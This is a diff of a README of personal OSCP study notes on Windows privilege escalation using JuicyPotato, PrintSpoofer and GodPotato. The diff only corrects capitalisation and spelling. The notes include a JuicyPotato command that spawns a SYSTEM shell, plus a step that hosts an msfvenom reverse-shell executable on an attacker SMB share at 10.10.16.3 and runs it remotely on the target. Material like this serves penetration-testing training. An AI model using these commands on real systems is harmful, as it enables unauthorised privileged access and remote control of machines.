AbdullahZuhair21/OSCP-Notes/README.md

 sometimes you need to migrate to another process to get the NT AUTHORITY\SYSTEM use godpotato check Jeeves box FYR
 4.1- use juicy potato by transferring the file to the target machine (AV is off).
-JuicyPotato doesn't work on windows server 2019 and windows 10 build 1809. use PrintSpoofer insted. download exe file -> https://github.com/ohpe/juicy-potato/releases/tag/v0.1
+JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809. use PrintSpoofer instead. download exe file -> https://github.com/ohpe/juicy-potato/releases/tag/v0.1
 -     juicypotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID of your windows machine} #you can get it from https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
-4.2- use juicy potato by setting up your SMB server (AV is on) put juicypotato.exe & reverse.exe from msfvenom in your SMB server
+4.2- Use Juicy Potato by setting up your SMB server (AV is on) put juicypotato.exe & reverse.exe from msfvenom in your SMB server
 -     impacket-smbserver raman `pwd` #set up SMB server
 -     cmd /c "\\10.10.16.3\raman\juicypotato.exe -l 1337 -p \\10.10.16.3\raman\reverse.exe -t * -c {CLSID of your windows machine}"